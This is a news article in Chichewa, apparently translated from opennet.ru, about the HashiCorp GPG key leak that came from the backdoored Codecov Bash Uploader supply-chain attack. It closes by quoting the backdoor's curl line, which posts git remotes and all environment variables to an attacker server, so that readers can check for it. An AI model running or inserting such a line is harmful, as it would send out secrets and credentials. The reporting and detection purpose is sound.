HashiCorp, yomwe imadziwika ndi kupanga zida zotseguka za Vagrant, Packer, Nomad ndi Terraform, yalengeza kutayikira kwa kiyi yachinsinsi ya GPG yomwe imagwiritsidwa ntchito popanga siginecha ya digito yomwe imatsimikizira zomwe zatulutsidwa. Zigawenga zomwe zidapeza kiyi ya GPG zitha kusintha zobisika kuzinthu za HashiCorp pozitsimikizira ndi siginecha yolondola ya digito. Nthawi yomweyo, kampaniyo inanena kuti pakuwunika, palibe zoyeserera zomwe zidadziwika.
Pakadali pano, kiyi ya GPG yosokoneza yathetsedwa ndipo kiyi yatsopano idayambitsidwa m'malo mwake. Vutoli lidakhudza kutsimikizira kokha pogwiritsa ntchito mafayilo a SHA256SUM ndi SHA256SUM.sig, ndipo silinakhudze kupanga masiginecha a digito a Linux DEB ndi RPM phukusi loperekedwa kudzera ku releases.hashicorp.com, komanso kumasula njira zotsimikizira za macOS ndi Windows (AuthentiCode) .
Kutayikiraku kudachitika chifukwa chogwiritsa ntchito script ya Codecov Bash Uploader (codecov-bash) pazomangamanga, zomwe zidapangidwa kuti zitsitse malipoti opezeka pamakina ophatikizika mosalekeza. Pachiwopsezo cha kampani ya Codecov, chitseko chakumbuyo chidabisidwa m'malemba omwe adanenedwa, momwe mapasiwedi ndi makiyi obisika adatumizidwa ku seva ya owukira.
Kuti athyole, owukirawo adatengerapo mwayi pakulakwitsa popanga chithunzi cha Codecov Docker, chomwe chidawalola kuti atulutse zidziwitso zopezeka ku GCS (Google Cloud Storage), zofunikira kuti asinthe zolemba za Bash Uploader zomwe zidagawidwa kuchokera ku codecov.io webusayiti. Zosinthazo zidasinthidwanso pa Januware 31, zidakhalabe zosadziwika kwa miyezi iwiri ndikulola owukira kuti atulutse zidziwitso zosungidwa m'malo ophatikizira makasitomala mosalekeza. Pogwiritsa ntchito nambala yoyipa yowonjezereka, owukira atha kudziwa zambiri za malo oyesedwa a Git ndi mitundu yonse ya chilengedwe, kuphatikiza ma tokeni, makiyi achinsinsi ndi mapasiwedi omwe amatumizidwa kumakina ophatikizika osalekeza kuti akonzekere mwayi wopeza ma code, nkhokwe ndi ntchito monga Amazon Web Services ndi GitHub.
Kuphatikiza pa kuyimba kwachindunji, script ya Codecov Bash Uploader idagwiritsidwa ntchito ngati gawo la okweza ena, monga Codecov-action (Github), Codecov-circleci-orb ndi Codecov-bitrise-step, omwe ogwiritsa ntchito amakhudzidwanso ndi vutoli. Ogwiritsa ntchito onse a codecov-bash ndi zinthu zina zofananira akulimbikitsidwa kuti afufuze zomwe ali nazo, komanso kusintha mawu achinsinsi ndi makiyi obisa. Mutha kuyang'ana kupezeka kwa backdoor mu script ndi kupezeka kwa mzere curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http:// /kweza/v2 | zoona
Source: opennet.ru